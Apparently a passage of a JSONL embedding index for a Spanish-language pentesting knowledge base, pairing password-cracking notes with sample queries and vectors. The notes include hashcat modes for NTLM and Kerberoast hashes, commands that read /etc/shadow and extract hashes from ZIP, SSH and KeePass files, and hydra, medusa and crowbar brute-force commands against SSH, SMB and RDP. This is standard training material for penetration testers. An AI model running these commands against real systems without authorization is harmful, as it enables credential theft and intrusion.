0.00695, -0.00238, 0.00464, 0.02652, 0.01409, 0.03869, -0.00766, -0.00449, 0.01829, 0.05454, -0.03178, 0.01809, -0.01115, -0.02635, -0.02462, -0.06749, 0.03178, 0.00473, -0.12997, -0.03859, 0.00441, 0.00296, 0.02687, -0.04372, -0.01569, -0.0904, 0.01577, 0.05366, -0.02641, 0.0146, -0.04233]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## hashcat β€” los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder β†’ Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) β†’ Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) β†’ AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "indexar": "con quΓ© puedo montar un ataque de Kerberoasting contra TGS?", "v": [-0.18219, -0.12766, -0.07526, 0.086, -0.14044, 0.02821, -0.00106, 0.26857, -0.0109, 0.06932, -0.07763, 0.10589, 0.06953, 0.03873, 0.18455, 0.03614, -0.00143, -0.08471, 0.17475, 0.02841, 0.06294, -0.05841, 0.11556, -0.1365, 0.00904, 0.06286, -0.06783, -0.10432, -0.09653, -0.00633, -0.0889, -0.01239, -0.0672, 0.00128, -0.03938, -0.02975, -0.15038, 0.13621, 0.13928, 0.08963, -0.00873, -0.10844, -0.06857, 0.05458, 0.0175, -0.09482, 0.07484, -0.05846, 0.02324, -0.00222, 0.1193, 0.0554, -0.09063, -0.08365, -0.07985, -0.05706, 0.0946, -0.07456, 0.00241, 0.02645, -0.0427, 0.06975, -0.09823, -0.03594, 0.00469, -0.16668, -0.04818, 0.00888, -0.04359, -0.05649, -0.03578, 0.00501, 0.02775, -0.00599, 0.05595, 0.05873, 0.0269, 0.12615, 0.00559, 0.01271, -0.04069, -0.00082, -0.06871, 0.12447, -0.02037, -0.06149, -0.01916, -0.10687, -0.06044, -0.02621, 0.01573, 0.094, -0.02174, -0.0663, -0.06346, -0.12098, -0.05324, 0.01589, 0.01617, -0.0064, -0.12503, -0.06962, -0.03228, 0.08477, 0.02396, -0.02711, -0.0821, -0.00565, 0.03753, -0.12084, 0.02172, -0.00517, -0.09928, 0.01051, -0.02069, -0.05703, -0.09868, 0.08881, 0.01907, 0.0872, -0.07862, 0.06714, 0.05756, 0.02468, -0.01175, 0.02628, 0.05961, 0.00437, -0.14496, -0.00388, 0.01398, 0.01007, 0.00764, -0.0312, -0.03799, 0.05994, -0.04717, -0.10302, -0.07285, 0.04388, 0.03687, 0.08445, 0.00154, 0.00232, -0.02057, 0.02351, -0.02283, -0.00674, -0.05441, 0.03347, 0.07134, 0.02192, 0.01524, -0.00387, -0.03049, -0.0739, 0.00296, -0.03178, 0.03525, 0.09011, -0.0167, 0.06476, -0.0315, 0.07102, 0.04331, -0.03939, -0.0131, -0.06676, 0.06926, 0.021, 0.02325, 0.02351, 0.02401, -0.00343, 0.03154, -0.03313, 0.02301, 0.00418, 0.01742, -0.02449, 0.01136, -0.03642, -0.03349, 0.02834, -0.04083, 0.00606, 0.06467, 0.04203, 0.04497, 0.0103, -0.01525, -0.0053, 0.01824, -0.02224, 0.04504, -0.08325, 0.01951, 0.01388, 0.00692, 0.01324, -0.03816, -0.04279, -0.01017, -0.02329, 0.0783, 0.0523, -0.0368, 0.06255, -0.00092, 0.04411, 0.05742, -0.04077, 0.07258, -0.05905, -0.09695, 0.05488, 0.02253, 0.01612, -0.04409, 0.0428, -0.00858, 0.00409, 0.04838, 0.03633, -0.01367, -0.04152, -0.02142, -0.06073, 0.02672, 0.02538, -0.02269, -0.05692, 0.03234, -0.02149, -0.02188, -0.0039, 0.01039, 0.05382, -0.05118, 0.04878, 0.03726, 0.00925, 0.03483, 0.00241, -0.0032, -0.05549, -0.04833, 0.04293, 0.01131, -0.01991, -0.02554, -0.00484, -0.04988, -0.00389, -0.01147, 0.00514]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## hashcat β€” los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder β†’ Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) β†’ Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) β†’ AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "indexar": "cual es una alternativa libre a hashcat para probar hashes NTLM?", "v": [-0.08425, -0.1182, -0.05957, -0.01775, -0.04906, -0.06002, -0.14425, 0.08065, -0.12894, 0.14851, -0.08152, -0.03821, 0.04005, 0.11047, 0.01368, 0.09946, -0.02143, -0.10952, 0.01704, 0.01213, -0.11522, -0.02407, -0.27347, -0.08752, -0.02086, -0.14797, -0.05298, 0.13588, -0.17902, 0.04036, -0.07215, -0.08036, -0.08946, 0.12854, -0.06262, 0.08845, 0.10111, 0.00715, 0.12023, 0.08575, 0.09249, 0.08786, -0.06581, 0.14284, 0.04375, -0.12648, -0.14042, -0.01519, 0.00662, -0.12741, 0.03064, 0.02575, -0.16247, -0.01193, 0.05684, -0.04344, 0.09037, -0.0247, -0.13324, -0.05452, -0.06448, -0.02184, 0.06381, -0.12725, -0.03079, -0.07474, -0.01686, 0.02823, -0.08647, 0.0983, -0.04063, 0.08151, 0.04347, -0.0746, -0.12311, 0.07182, -0.05334, -0.03131, 0.05064, 0.08947, 0.07133, -0.11719, 0.03535, 0.03727, -0.09109, -0.06306, 0.0252, -0.07683, 0.05159, 0.09392, 0.06426, 0.03918, 0.00821, 0.07178, 0.03073, -0.06887, 0.0858, 0.01602, 0.02697, 0.01502, 0.03295, -0.0093, -0.09826, 0.08159, -0.07769, -0.03957, 0.00264, 0.04858, -0.02847, 0.05811, 0.06864, -0.03811, -0.07383, 0.04149, -0.01113, -0.05248, -0.03121, 0.02216, -0.04226, -0.00393, -0.01727, 0.02409, -0.00026, 0.03558, 0.07027, -0.01199, 0.01934, 0.04485, -0.05925, 0.03129, 0.08938, -0.00231, -0.06411, -0.01632, -0.00351, 0.00872, 0.0702, -0.00804, 0.02298, -0.03515, 0.07266, 0.05283, -0.0199, -0.03099, 0.05098, 0.004, -0.04183, -0.01081, 0.00833, -0.02653, 0.0155, -0.01267, 0.00907, 0.07546, -0.07796, -0.01368, -0.02237, -0.0252, -0.11004, 0.08256, 0.02391, 0.01118, -0.01304, 0.0552, 0.00696, 0.01436, 0.02458, -0.05243, -0.02827, -0.01339, 0.01389, 0.03578, 0.03664, -0.05788, 0.05929, -0.05702, 0.01198, -0.03796, -0.03507, -0.07423, 0.04914, 0.02296, -0.03894, -0.04693, 0.02327, -0.03285, 0.03059, 0.06989, 0.01067, 0.00212, -0.02943, 0.05349, -0.10611, -0.05554, 0.04108, 0.0344, 0.06912, -0.07834, -0.00742, -0.01826, -0.03735, -0.01858, -0.00435, -0.04442, -0.00649, -0.01399, -0.05176, 0.0158, 0.00023, 0.0074, 0.0516, 0.04053, 0.09215, 0.02854, -0.06878, 0.02345, 0.00886, -0.00423, 0.00183, 0.00756, -0.02371, 0.04083, 0.02299, 0.02829, -0.01439, 0.00448, 0.01032, 0.07872, -0.0151, -0.00693, 0.03157, 0.01299, -0.00557, 0.04227, 0.00129, -0.00865, -0.00689, 0.05418, -0.02545, -0.0505, 0.03847, 0.06093, -0.04889, -0.01468, 0.00953, -0.01375, -0.06235, 0.01374, -0.03919, -2e-05, -0.02702, 0.02017, 0.0244, 0.00917, -0.02252, 0.01435]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "indexar": "que programa sirve para romper contraseΓ±as de usuarios en el sistema?", "v": [0.07387, 0.01166, -0.15143, -0.26511, -0.01608, -0.16062, 0.00309, -0.134, -0.0324, -0.08227, -0.08509, -0.04966, 0.08365, -0.13969, 0.04415, -0.09762, 0.02617, -0.02161, 0.09762, 0.12328, -0.05942, -0.02611, -0.01134, -0.03545, -0.02776, 0.03898, -0.01705, -0.09409, -0.06899, -0.02248, -0.00507, -0.1276, 0.0611, -0.06179, -0.05613, 0.05001, 0.0478, 0.04928, 0.02811, 0.11251, 0.19281, 0.03209, -0.0959, 0.05579, 0.04885, 0.0163, 0.01816, -0.01452, 0.12009, -0.02462, -0.09298, -0.01889, -0.08286, -0.02419, 0.02401, -0.1712, 0.04928, -0.06441, -0.06079, 0.01926, -0.1195, 0.0537, 0.05267, 0.02448, -0.00197, -0.07579, 0.06222, -0.02501, -0.09324, 0.14868, 0.01408, 0.00991, 0.00806, -0.0025, 0.00853, 0.08791, 0.02549, -0.07131, 0.02757, 0.01186, -0.04984, 0.03193, -0.0063, 0.02797, -0.096, 0.00497, 0.08382, -0.00097, 0.03594, -0.04343, 0.06472, 0.06095, 0.05374, 0.07451, 0.11063, -0.10251, 0.08764, -0.01539, -0.05579, 0.03852, 0.02161, 0.00624, -0.04889, 0.11851, -0.1108, -0.01729, 0.05843, -0.01533, 0.0386, -0.06112, 0.05228, -0.00722, -0.02269, -0.06324, -0.07732, 0.00849, -0.04579, -0.06482, 0.00457, 0.0075, -0.07076, 0.04228, -0.02966, -0.02504, 0.12103, 0.08294, 0.03365, 0.07342, -0.06731, -0.00258, 0.04473, -0.0423, -0.0675, 0.05245, -0.07677, -0.04015, 0.01768, -0.05406, -0.07416, -0.00352, -0.01986, 0.07463, -0.00911, 0.00159, 0.07993, 0.03432, 0.1233, -0.07314, -0.01605, 0.00505, -0.03311, 0.03472, -0.07405, -0.00194, -0.09197, -0.00353, -0.0247, -0.09935, -0.09397, 0.06005, -0.0228, -0.02949, -0.006, -0.02081, -0.02605, -0.04506, 0.03169, 0.04208, 0.13079, 0.09721, 0.02701, 0.10846, 0.10054, -0.05267, 0.00567, 0.01528, 0.00925, -0.11967, -0.02384, -0.02329, -0.07765, -0.0056, 0.0336, 0.00149, -0.03186, -0.04861, -0.01647, 0.0672, -0.00186, -0.01069, 0.02466, 0.0133, -0.03392, 0.05809, 0.01483, -0.00514, -0.02622, -0.00795, 0.01884, -0.05721, -0.04458, 0.04774, 0.03104, -0.0372, 0.01108, 0.07411, 0.03743, -0.06793, 0.0659, 0.06869, 0.02702, -0.00587, 0.01917, -0.01172, -0.07544, -0.05872, -0.02316, 0.06708, 0.03121, -0.01395, -0.01547, -0.01762, 0.01577, 0.08713, 0.0044, -0.07317, -0.02452, 0.01046, 0.01654, -0.02087, -0.00205, -0.08137, -0.00202, 0.02302, 0.05036, -0.07087, -0.07462, -0.03517, -0.00987, -0.10658, -0.06755, 0.10837, 0.01856, -0.07365, -0.02206, 0.00046, -0.0394, -0.02895, 0.00012, -0.00607, -0.09156, 0.04125, 0.00768, -0.0207, 0.00401, 0.01418]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "indexar": "con quΓ© puedo extraer las hashes NTFS y probarlas con una lista de palabras?", "v": [-0.03176, -0.02683, -0.07537, -0.03386, -0.02873, -0.05717, -0.08475, 0.03237, -0.08986, 0.06293, -0.15519, 0.04821, 0.02552, 0.04226, -0.01208, 0.06108, 0.08833, -0.03626, 0.02698, 0.0748, -0.05503, -0.10301, -0.27688, -0.10701, 0.00623, -0.13324, -0.10568, 0.08499, -0.12236, 0.11465, -0.07158, -0.01806, -0.03692, -0.01477, -0.02058, 0.15366, 0.00156, 0.10258, 0.03791, 0.02995, 0.06984, 0.18621, -0.06725, 0.12463, -0.03923, -0.10385, -0.15335, -0.00859, 0.03186, -0.10169, 0.0984, -0.05984, -0.07707, 0.01202, -0.08011, -0.09226, 0.08085, 0.02406, -0.11336, -0.03916, -0.08124, 0.03393, -0.01532, -0.09405, -0.01844, -0.11046, 0.03321, 0.05277, -0.0809, 0.06531, -0.07615, 0.08119, 0.02494, -0.05186, 0.01113, 0.05333, -0.01769, -0.02197, 0.02105, 0.0711, 0.0054, -0.126, -0.06891, 0.00428, -0.03032, -0.05904, -0.01905, -0.02587, -0.03691, -0.01775, 0.01661, -0.01412, 0.00167, -0.02645, 0.05401, -0.03526, 0.07168, 0.09542, 0.01372, -0.01383, 0.09715, -0.08845, -0.06962, 0.16412, -0.11894, -0.0308, 0.09974, 0.06192, -0.02299, -0.03954, 0.09267, -0.08482, -0.0792, -0.06886, -0.04783, -0.04957, -0.07712, 0.02197, -0.10429, -0.0163, -0.01492, -0.04972, 0.05282, 0.07391, 0.05827, 0.02456, -0.03076, 0.04595, -0.07855, -0.02659, 0.06238, 0.114, -0.03625, -0.08251, 0.08689, -0.0212, -0.0111, 0.00874, 0.03691, -0.07, 0.02829, 0.01695, -0.04976, 0.02766, 0.03255, -0.02791, -0.01957, 0.04147, -0.06194, -0.02835, 0.07932, -0.05437, 0.07908, 0.07641, -0.07196, -0.00539, 0.05854, 0.02932, -0.03427, 0.04805, -0.05429, -0.01148, -0.05917, 0.05816, 0.04944, 0.04554, -0.03359, -0.02312, 0.0245, 0.00301, -0.00936, -0.00605, 0.04126, -0.02534, 0.01542, 0.03097, 0.0161, -0.00683, -0.02653, -0.08453, -0.03305, 0.00238, -0.09325, -0.04015, 0.02189, -0.05162, 0.06584, 0.02173, -0.04857, 0.02732, 0.00141, 0.12005, -0.06562, -0.02209, 0.0214, -0.00694, 0.05648, -0.00098, -0.01523, -0.11154, -0.02054, -0.03259, 0.04067, -0.0788, 0.00225, 0.06304, -0.0659, 0.05364, -0.0193, 0.01432, 0.07569, 0.04732, 0.02061, -0.00309, -0.10898, 0.03677, -0.02576, 0.04048, -0.02885, 0.00926, 0.01067, 0.08831, 0.09952, 0.00369, -0.01483, -0.04959, -0.02256, 0.04853, 0.05176, 0.01106, -0.01294, 0.01111, -0.01996, -0.00806, 0.00694, -0.0017, -0.02479, 0.01244, -0.02219, -0.02382, 0.03195, 0.07358, -0.0466, -0.05485, -0.03742, -0.0567, -0.02654, 0.02826, -0.02168, -0.01863, -0.05502, -0.02182, 0.03997, -0.04433, 0.0207, 0.03677]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "indexar": "cual es una alternativa libre a los mΓ©todos de cracking por reglas o diccionario?", "v": [0.18442, 0.05711, -0.00437, -0.00715, -0.05791, -0.08725, -0.02236, -0.00051, -0.08346, -0.05771, 0.00113, -0.12682, -0.0424, -0.13585, 0.14433, -0.06949, 0.06206, -0.06558, 0.0463, -0.07787, -0.07632, -0.13942, -0.10082, -0.05514, -0.02536, -0.1475, 0.01524, 0.03332, -0.11811, 0.02622, -0.0699, 0.04446, 0.17112, -0.08458, -0.10754, 0.12091, 0.14198, 0.03736, 0.05762, 0.05034, -0.11514, -0.12328, -0.09321, 0.08766, -0.06753, -0.02946, -0.1407, 0.06669, -0.0416, -0.00648, 0.09414, -0.05509, 0.01527, 0.01774, 0.03983, -0.06127, 0.13688, -0.03276, -0.11289, -0.01866, -0.0618, 0.00161, 0.05836, 0.03811, -0.04239, 0.00613, -0.0119, -0.00596, 0.00631, 0.16182, 0.07628, -0.03539, 0.04737, -0.04381, -0.00696, 0.05124, 0.03204, -0.06508, 0.05461, -0.00848, 0.00405, -0.04841, 0.00604, 0.01173, -0.07852, -0.01062, 0.11956, -0.11772, 0.05889, -0.01505, 0.00707, 0.04813, 0.00237, 0.05939, -0.0435, -0.09332, -0.02334, 0.0879, 0.02312, 0.10767, 0.07857, 0.04071, -0.12577, -0.00013, -0.04238, -0.08592, 0.02617, -0.03621, -0.0046, -0.05888, 0.09802, 0.09375, 0.00735, -0.02516, 0.01756, -0.05852, -0.00945, -0.00213, -0.05212, 0.01962, -0.04068, -0.01327, -0.00071, 0.04427, 0.0486, 0.01419, 0.09007, 0.14287, -0.06144, -0.02479, 0.07292, -0.06757, -0.07483, -0.04419, -0.06272, -0.01383, 0.11387, -0.05525, 0.0234, -0.05797, -0.06044, 0.0032, -0.04685, -0.00937, 0.05054, -0.08587, 0.06432, -0.05832, -0.06079, -0.00084, -0.07346, 0.06878, 0.00196, 0.14131, -0.04811, 0.01068, -0.02278, -0.06576, -0.04345, 0.09009, 0.07721, -0.01593, 0.02049, -0.04214, -0.02292, 0.01884, 0.06485, -0.02208, -0.05554, -0.06374, 0.0479, 0.09881, 0.02617, 0.02222, 0.01985, -0.00826, -0.04546, -0.07003, 0.00397, -0.10887, -0.00862, 0.05103, -0.10802, -0.03198, 0.01467, -0.02143, 0.10114, 0.0055, -0.0423, 0.04843, -0.00629, -0.02484, -0.14811, -0.07122, -0.02906, 0.02884, 0.06786, 0.02935, -0.01772, -0.10666, 0.03553, -0.01954, 0.00124, -0.04227, -0.02975, 0.00843, 0.01116, -0.04815, -0.01624, 0.06476, 0.06514, 0.04537, -0.03664, 0.06631, -0.0777, 0.01341, -0.03621, 0.02579, -0.04628, -0.06998, 0.07519, 0.06711, -0.01967, 0.0104, -0.01595, -0.00178, -0.01794, 0.00749, -0.01497, 0.05176, 0.00787, -0.00646, 0.05258, 0.03158, 0.00856, 0.01577, 0.01451, 0.02183, 0.00968, -0.07917, 0.03842, 0.00443, -0.01642, 0.00058, -0.03475, -0.01967, -0.00852, 0.00999, -0.0332, -0.00267, -0.00976, 0.03667, 0.01097, 0.03377, 0.03664, -0.04793]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Wordlists a medida\n```bash\ncewl http://IP -m 6 -w custom.txt # palabras de la propia web\ncrunch 8 8 -t @@@@%%%% -o crunch.txt # patrones\n```", "indexar": "que programa genera palabras de la propia web para pruebas?", "v": [-0.01049, 0.03394, -0.03038, -0.2696, -0.06608, -0.03558, 0.0689, -0.06278, 0.02408, -0.14924, -0.00977, 0.11267, -0.04447, -0.07761, 0.01517, 0.05085, 0.14226, -0.067, 0.09319, -0.01004, -0.06635, -0.04157, -0.05436, -0.10937, -0.02815, -0.05344, 0.00328, -0.00928, 0.11414, 0.08269, -0.07209, 0.09882, 0.07349, -0.13834, -0.1024, 0.15401, -0.03249, 0.06095, 0.03377, 0.11233, 0.01899, -0.09326, -0.03906, 0.07387, 0.01627, 0.0346, -0.00304, -0.0313, -0.07192, -0.10689, -0.04878, -0.03383, 0.10566, 0.03854, 0.03152, -0.12569, 0.0615, -0.12183, -0.12177, -0.03818, -0.05041, 0.01189, 0.07101, -0.03615, 0.03612, -0.00399, 0.03561, 0.0941, -0.05951, 0.0454, 0.04242, -0.01162, 0.06822, -0.05295, -0.00086, -0.00761, 0.02308, -0.00096, 0.01458, -0.04939, 0.01177, -0.09648, -0.00651, 0.10916, -0.06844, 0.00628, -0.00841, -0.03942, 0.006, -0.06539, -0.03404, 0.05701, 0.0254, 0.03546, -0.02328, -0.10951, 0.10891, -0.02865, 0.10238, -0.01271, -0.00013, -0.04957, -0.04452, -0.00036, -0.08143, 0.08081, 0.10655, 0.03059, -0.06589, -0.00051, 0.06696, -0.02371, -0.03344, -0.10268, -0.10086, 0.02179, 0.04781, -0.07131, -0.04491, -0.1378, -0.05691, -0.02013, -0.03596, 0.04658, -0.05055, 0.02098, -0.03874, -0.00433, -0.05372, 0.07883, 0.07039, 0.09562, -0.00114, -0.06845, -0.03355, -0.00487, -0.05075, -0.04533, 0.06665, -0.05263, -0.04382, 0.03443, -0.03566, -0.01353, 0.02293, 0.00309, -0.08978, -0.01019, -0.07588, 0.02754, -0.06726, -0.05557, 0.00515, 0.07347, -0.15424, -0.03602, -0.01858, 0.01939, -0.01557, 0.01959, -0.05789, -0.05427, -0.06527, -0.03054, 0.07288, 0.01556, -0.08939, 0.06197, 0.05347, 0.08982, -0.02004, -0.00293, 0.06658, -0.03221, 0.04217, 0.07907, -0.04999, -0.05513, -0.01016, -0.09191, -0.11993, -0.02153, -0.11503, -0.05987, 0.02957, -0.06366, 0.02789, 0.01667, 0.04458, 0.00126, -0.00104, 0.00038, -0.06165, 0.02112, 0.0235, 0.01739, -0.05233, 0.03565, 0.05422, -0.10767, -0.05803, -0.08054, 0.02974, -0.02096, -0.0361, 0.10621, 0.00559, -0.04426, 0.02807, 0.06548, 0.0067, 0.0084, 0.01138, -0.00876, -0.07583, -0.0149, 0.00793, 0.03857, -0.02544, 0.0694, 0.02658, 0.03597, 0.0097, 0.0519, -0.03827, -0.04866, -0.05306, 0.02737, 0.13481, -0.02373, -0.01879, -0.05955, 0.02369, -0.03889, 0.02192, -0.02301, 0.01798, 0.0377, 0.00029, -0.11008, -0.04172, 0.04747, -0.02796, -0.06431, -0.05016, -0.00523, -0.06142, -0.06094, 0.01793, 0.08415, -0.09914, -0.01677, -0.04311, -0.04142, 0.09027, 0.03415]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Wordlists a medida\n```bash\ncewl http://IP -m 6 -w custom.txt # palabras de la propia web\ncrunch 8 8 -t @@@@%%%% -o crunch.txt # patrones\n```", "indexar": "cual es una herramienta para crear listas con patrones personalizados?", "v": [0.168, 0.07605, -0.08609, -0.10561, 0.03868, -0.13508, 0.07905, -0.06145, -0.12545, -0.15686, -0.02788, 0.01609, 0.02881, -0.12453, -0.04186, 0.02444, 0.04183, -0.10902, 0.05232, 0.08761, -0.06833, 0.069, -0.18415, -0.07029, -0.11433, -0.1319, 0.155, -0.03625, -0.22671, 0.18334, -0.00024, 0.01215, -0.01676, -0.05055, -0.01806, -0.09257, 0.0029, 0.05267, -0.11287, 0.0931, 0.00047, 0.03171, -0.09161, 0.09511, -0.02334, 0.02853, 0.00362, 0.07719, 0.02136, 0.10737, -0.0159, -0.08283, -0.14765, 0.01153, 0.06734, -0.25023, 0.13105, -0.09804, -0.03456, -0.05077, -0.16274, 0.02663, -0.00399, -0.02631, 0.00803, -0.02153, -0.05971, -0.06973, -0.04094, 0.03179, 0.01322, -0.05757, 0.0459, -0.04642, 0.07471, 0.08112, 0.03, 0.04119, -0.01727, 0.01846, -0.00307, -0.06177, -0.01539, -0.01609, -0.03449, -0.03473, 0.01337, 0.06282, 0.00102, -0.14866, -0.0181, 0.00411, -0.04447, 0.04696, 0.01293, 0.00498, 0.13417, 0.01422, -0.04286, 0.03631, 0.06799, -0.03705, -0.07185, 0.09902, 0.04353, -0.03139, -0.04882, -0.01208, -0.0925, 0.01884, 0.05741, 0.00938, 0.03392, 0.0592, 0.01776, 0.0031, -0.05552, 0.00398, -0.03423, -0.07302, 0.02848, 0.05648, -0.09908, -0.02308, 0.0292, 0.06743, 0.01417, 0.12343, -0.05664, -0.02331, -0.00371, 0.02049, -0.07803, -0.02931, -0.06114, -0.01651, -0.00648, -0.08095, 0.04071, -0.04852, 0.01489, -0.01187, 0.00742, -0.05049, 0.04226, -0.01067, 0.00274, -0.05545, -0.08173, 0.09838, 0.01109, 0.00817, -0.00011, 0.01903, -0.05372, -0.02522, -0.085, 0.01821, -0.03715, 0.02621, 0.00702, -0.02925, 0.0479, -0.03353, 0.03576, -0.04397, 0.03782, 0.01681, 0.07807, 0.02189, 0.00051, 0.00795, 0.05609, -0.0332, 0.06274, -0.06352, -0.06846, -0.01807, 0.00526, -0.05518, -0.05206, 0.00595, -0.00322, -0.04024, 0.02118, -0.12161, 0.0948, 0.00673, 0.01367, 0.05387, -0.06803, 0.02199, 0.01086, -0.0741, 0.07073, 0.02452, 0.05678, -0.0577, -0.00293, -0.02921, -0.01684, -0.02654, -0.02054, -0.05628, 0.02777, 0.04414, -0.04285, -0.00686, 0.03157, 0.0234, 0.04678, 0.00205, 0.0239, -0.02794, -0.02027, 0.02146, -0.07128, -0.02917, 0.01741, -0.00587, 0.0479, -0.0114, 0.03965, -0.00229, -0.02027, 0.06238, 0.02648, 0.0183, 0.01245, -0.02362, 0.02912, -0.04263, 0.02437, -0.03583, 0.00866, -0.00555, 0.03233, -0.0389, -0.03051, 0.00905, -0.00612, 0.08332, 0.03069, -0.00865, 0.00477, -0.03202, 0.01148, -0.02623, -0.09453, -0.10956, -0.02265, 0.015, 0.03623, -0.02796, 0.06305, -0.03156]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks Β· Kerberoasting Β· Pass-the-Hash Β· OSCP MOC", "indexar": "quΓ© herramienta puedo usar para probar ataques de autenticaciΓ³n remota con usuarios y contraseΓ±as?", "v": [0.04181, 0.05743, -0.22908, -0.2002, 0.04463, -0.02787, -0.00458, -0.04508, -0.05517, 0.01019, -0.07956, -0.05346, 0.0362, -0.01598, 0.01299, -0.02433, 0.11029, 0.00719, 0.08211, 0.00644, 0.04046, -0.08837, -0.08482, -0.0025, -0.08164, -0.03553, 0.06869, 0.01336, -0.04903, -0.05369, -0.00205, -0.02533, 0.07049, 0.00336, -0.089, 0.04531, 0.01489, 0.08251, 0.12949, 0.11894, 0.12141, 0.02115, -0.171, -0.01642, 0.09987, 0.08315, -0.01248, -0.00562, -0.01317, 0.0169, -0.06853, -0.12244, -0.15782, -0.0608, -0.08782, -0.13059, 0.20162, -0.08879, 0.06825, -0.04373, -0.14675, 0.02325, 0.00899, 0.04428, -0.03131, -0.14524, 0.02126, -0.03861, -0.16299, 0.13739, -0.0071, 0.02441, -0.03389, 0.04457, 0.03328, 0.01005, 0.01212, -0.01093, 0.06928, 0.02825, -0.05482, -0.01734, -0.0271, -0.07254, -0.15261, -0.07886, 0.06199, -0.04222, 0.03205, -0.10435, 0.06793, 0.00406, 0.01956, -0.02625, 0.01936, -0.03759, 0.03643, -0.10247, -0.04769, -0.08859, 0.05031, -0.01301, -0.02794, 0.14895, -0.04526, -0.003, -0.02299, -0.0326, -0.02051, -0.10384, -0.00315, -0.05806, -0.08561, -0.01454, -0.00267, -0.00317, -0.069, -0.10661, 0.02252, -0.04681, -0.01587, -0.00974, -0.03087, -0.01273, 0.07023, 0.06372, 0.01485, 0.03276, -0.05202, -0.11136, 1e-05, -0.04289, -0.04235, 0.0294, -0.04054, 0.03585, -0.0042, -0.18647, -0.0542, 0.00502, -0.00282, 0.05739, -0.0287, -0.04722, 0.07235, 0.05712, -0.02243, -0.03841, -0.09085, 0.01662, 0.03143, -0.04177, -0.01215, 0.05619, -0.09497, -0.00589, -0.04881, -0.06284, -0.10501, 0.09143, -0.04769, -0.04332, -0.00865, 0.02889, -0.05167, -0.06477, 0.03634, 0.01212, 0.06064, 0.07137, 0.0262, 0.09812, 0.06216, -0.0524, 0.04819, -0.03666, -0.02468, -0.07113, -0.03509, -0.10238, -0.02391, -0.0675, -0.04732, -0.04744, 0.04385, -0.02338, 0.07202, 0.02385, 0.01788, 0.04886, -0.0132, 0.03554, 0.00691, 0.03468, 0.05232, -0.00599, -0.00444, -0.04928, -0.0069, -0.02747, -0.00751, -0.04701, -0.04284, -0.06125, 0.08113, 0.03229, -0.04773, -0.04385, -0.01745, 0.02114, 0.05563, -0.03478, 0.04558, -0.05732, -0.08118, -0.03104, 0.01117, 0.00739, -0.04043, -0.02135, 0.00637, 0.02024, 0.03349, 0.0594, 0.03058, 0.04697, -0.01661, -0.03798, 0.0045, -0.02379, 0.04638, -0.01123, -0.05192, -0.00833, 0.04181, -0.05108, 0.01892, -0.02404, -0.05942, -0.01194, -0.06956, 0.07697, 0.00707, -0.04493, -0.06291, -0.03635, -0.05696, -0.00264, -0.04995, -0.05011, -0.05086, 0.01138, 0.05776, 